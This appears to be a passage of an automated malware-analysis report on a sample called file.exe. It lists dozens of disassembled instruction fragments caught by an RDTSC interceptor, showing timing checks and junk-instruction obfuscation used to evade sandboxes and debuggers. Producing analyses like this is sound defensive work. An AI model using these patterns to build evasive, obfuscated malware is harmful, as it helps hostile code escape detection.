                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1112D second address: B1117A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBEh 0x00000007 pushad 0x00000008 ja 00007FE784D2BEB6h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FE784D2BEC8h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE784D2BEC7h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1117A second address: B11184 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE784B99A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1140A second address: B11439 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC2h 0x00000007 jmp 00007FE784D2BEC9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B11720 second address: B11772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE784B99A38h 0x0000000a jmp 00007FE784B99A38h 0x0000000f popad 0x00000010 push edi 0x00000011 jmp 00007FE784B99A39h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B154BC second address: B154C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B154C1 second address: B154C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B154C6 second address: B154CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1552E second address: B15543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15543 second address: B1558B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jg 00007FE784D2BEB6h 0x00000011 jmp 00007FE784D2BEBFh 0x00000016 popad 0x00000017 pop esi 0x00000018 nop 0x00000019 mov si, 153Dh 0x0000001d push 00000000h 0x0000001f add esi, dword ptr [ebp+122D1BCEh] 0x00000025 push 5F86362Ah 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FE784D2BEC2h 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1558B second address: B15642 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FE784B99A31h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 5F8636AAh 0x00000012 mov edx, 775BF4C1h 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FE784B99A28h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 sub dword ptr [ebp+122D2B57h], edi 0x00000039 push 00000000h 0x0000003b movsx edx, dx 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007FE784B99A28h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a xor edx, dword ptr [ebp+122D2745h] 0x00000060 jne 00007FE784B99A33h 0x00000066 call 00007FE784B99A29h 0x0000006b push eax 0x0000006c push edx 0x0000006d jc 00007FE784B99A3Eh 0x00000073 jmp 00007FE784B99A38h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15642 second address: B15648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15648 second address: B1564C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1564C second address: B1567D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FE784D2BECFh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1567D second address: B15681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15681 second address: B156AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE784D2BEC2h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jo 00007FE784D2BEC4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FE784D2BEB6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15788 second address: B1578C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1578C second address: B157A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15958 second address: B15965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007FE784B99A2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15965 second address: B15970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15970 second address: B15984 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15984 second address: B1598F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE784D2BEB6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1598F second address: B159CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE784B99A33h 0x00000008 ja 00007FE784B99A26h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 jnc 00007FE784B99A26h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE784B99A2Fh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B159CC second address: B159E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c pushad 0x0000000d jmp 00007FE784D2BEBEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15AC7 second address: B15ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15ACB second address: B15ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FE784D2BEBCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15ADC second address: B15AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357A2 second address: B357AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357AB second address: B357B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357B1 second address: B357C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEC4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357C9 second address: B357DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE784B99A2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B357DD second address: B35800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE784D2BEB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FE784D2BEC2h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B336EC second address: B336F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B336F2 second address: B336F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B336F6 second address: B33718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A35h 0x00000007 jg 00007FE784B99A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33718 second address: B3371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33837 second address: B33870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A34h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FE784B99A38h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B339DA second address: B339FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE784D2BEBDh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33B6B second address: B33B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33B71 second address: B33B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE784D2BEB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33B7B second address: B33B88 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33FAF second address: B33FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33FB3 second address: B33FCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FE784B99A26h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34151 second address: B3415C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE784D2BEB6h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3415C second address: B3417C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FE784B99A26h 0x00000009 jmp 00007FE784B99A2Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3417C second address: B34197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B345F0 second address: B34605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE784B99A2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3471F second address: B34734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784D2BEBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34734 second address: B34738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A7D0 second address: B2A7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3486A second address: B34889 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE784B99A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE784B99A35h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34889 second address: B34894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FE784D2BEB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34894 second address: B348D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE784B99A26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE784B99A39h 0x00000012 jmp 00007FE784B99A37h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35191 second address: B35197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35197 second address: B351A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B351A0 second address: B351A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35351 second address: B35385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jno 00007FE784B99A38h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35385 second address: B3538B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CD45 second address: B3CD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B042FE second address: B0430D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007FE784D2BEB6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40627 second address: B40641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B407A7 second address: B407AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B407AD second address: B407B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B407B7 second address: B407D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE784D2BEB6h 0x0000000a popad 0x0000000b jg 00007FE784D2BEC0h 0x00000011 jmp 00007FE784D2BEBAh 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B407D7 second address: B4080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FE784B99A35h 0x0000000d popad 0x0000000e jnl 00007FE784B99A2Ah 0x00000014 ja 00007FE784B99A28h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4080D second address: B40811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4092F second address: B4093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jg 00007FE784B99A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4093E second address: B40942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40942 second address: B4094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE784B99A26h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40C69 second address: B40C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40C6E second address: B40C8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE784B99A32h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40C8A second address: B40C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40F5F second address: B40F83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE784B99A39h 0x00000007 push ecx 0x00000008 jc 00007FE784B99A26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44A62 second address: B44A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B44B94 second address: B44B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45CD1 second address: B45D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784D2BEC6h 0x00000009 popad 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FE784D2BEB8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a movzx esi, bx 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D1B14h] 0x00000035 push eax 0x00000036 pushad 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45D1E second address: B45D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE784B99A39h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE784B99A39h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46D7A second address: B46DDB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE784D2BEB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FE784D2BEC6h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FE784D2BEB8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D2AFAh] 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D1BBFh], edx 0x00000039 push 00000000h 0x0000003b mov esi, dword ptr [ebp+122D285Dh] 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B465B1 second address: B465B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B485E1 second address: B485E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B485E8 second address: B48604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007FE784B99A26h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push ecx 0x00000010 jmp 00007FE784B99A2Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48604 second address: B48612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 jno 00007FE784D2BEB6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AA44 second address: B4AA48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B492B9 second address: B492BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49D36 second address: B49D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AA48 second address: B4AA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4A75D second address: B4A761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4AA4E second address: B4AA64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE784D2BEC1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C9FC second address: B4CA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51624 second address: B5162E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FE784D2BEB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D133 second address: B4D137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
